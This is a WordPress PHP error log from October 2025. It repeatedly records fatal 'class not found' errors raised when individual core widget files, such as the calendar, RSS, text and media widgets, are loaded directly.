[13-Oct-2025 19:34:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[13-Oct-2025 22:47:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[13-Oct-2025 23:09:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[14-Oct-2025 00:22:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[14-Oct-2025 07:49:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[14-Oct-2025 10:53:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[14-Oct-2025 13:57:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[14-Oct-2025 23:37:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[15-Oct-2025 03:03:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[15-Oct-2025 09:31:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[16-Oct-2025 00:23:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[16-Oct-2025 06:18:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[16-Oct-2025 10:32:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[16-Oct-2025 12:06:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[16-Oct-2025 14:05:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[16-Oct-2025 14:31:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[16-Oct-2025 16:35:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[16-Oct-2025 17:10:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[16-Oct-2025 19:52:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[16-Oct-2025 20:26:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[16-Oct-2025 20:27:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[17-Oct-2025 02:16:25 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[17-Oct-2025 11:09:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[17-Oct-2025 13:22:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[17-Oct-2025 14:14:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[17-Oct-2025 16:57:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[17-Oct-2025 20:08:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[17-Oct-2025 22:23:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[18-Oct-2025 07:46:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[18-Oct-2025 17:35:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[19-Oct-2025 01:22:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[19-Oct-2025 04:52:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[19-Oct-2025 06:49:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[19-Oct-2025 08:44:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[19-Oct-2025 12:54:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[19-Oct-2025 13:28:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[19-Oct-2025 23:24:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[20-Oct-2025 02:27:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[20-Oct-2025 08:02:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[20-Oct-2025 09:13:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[20-Oct-2025 09:45:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[20-Oct-2025 10:09:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[20-Oct-2025 10:09:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[20-Oct-2025 10:09:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[20-Oct-2025 10:09:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[20-Oct-2025 10:09:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[20-Oct-2025 10:09:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[20-Oct-2025 10:09:25 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[20-Oct-2025 10:09:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[20-Oct-2025 10:09:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[20-Oct-2025 10:09:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[20-Oct-2025 10:09:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[20-Oct-2025 10:09:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[20-Oct-2025 10:09:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[20-Oct-2025 10:09:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[20-Oct-2025 10:09:40 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[20-Oct-2025 10:09:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[20-Oct-2025 10:09:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[20-Oct-2025 10:09:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[20-Oct-2025 10:09:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[20-Oct-2025 10:09:48 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[20-Oct-2025 14:15:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[20-Oct-2025 17:01:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[21-Oct-2025 00:39:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[21-Oct-2025 06:17:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[21-Oct-2025 15:35:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[23-Oct-2025 03:44:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[23-Oct-2025 05:04:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[23-Oct-2025 09:14:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[23-Oct-2025 10:55:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[23-Oct-2025 23:06:37 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[24-Oct-2025 01:04:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[24-Oct-2025 05:11:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[24-Oct-2025 12:45:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[24-Oct-2025 13:24:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[24-Oct-2025 18:38:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[24-Oct-2025 19:21:25 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[24-Oct-2025 21:41:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[25-Oct-2025 00:22:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[25-Oct-2025 00:40:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[25-Oct-2025 03:14:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[25-Oct-2025 04:06:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[25-Oct-2025 05:05:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[25-Oct-2025 08:57:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[25-Oct-2025 13:34:37 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[25-Oct-2025 17:19:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[25-Oct-2025 21:36:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[26-Oct-2025 05:18:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[26-Oct-2025 06:03:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[27-Oct-2025 02:22:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[27-Oct-2025 08:03:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[27-Oct-2025 15:46:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[27-Oct-2025 16:48:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[27-Oct-2025 21:42:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[28-Oct-2025 12:31:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[28-Oct-2025 16:36:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[28-Oct-2025 16:43:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[28-Oct-2025 21:09:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
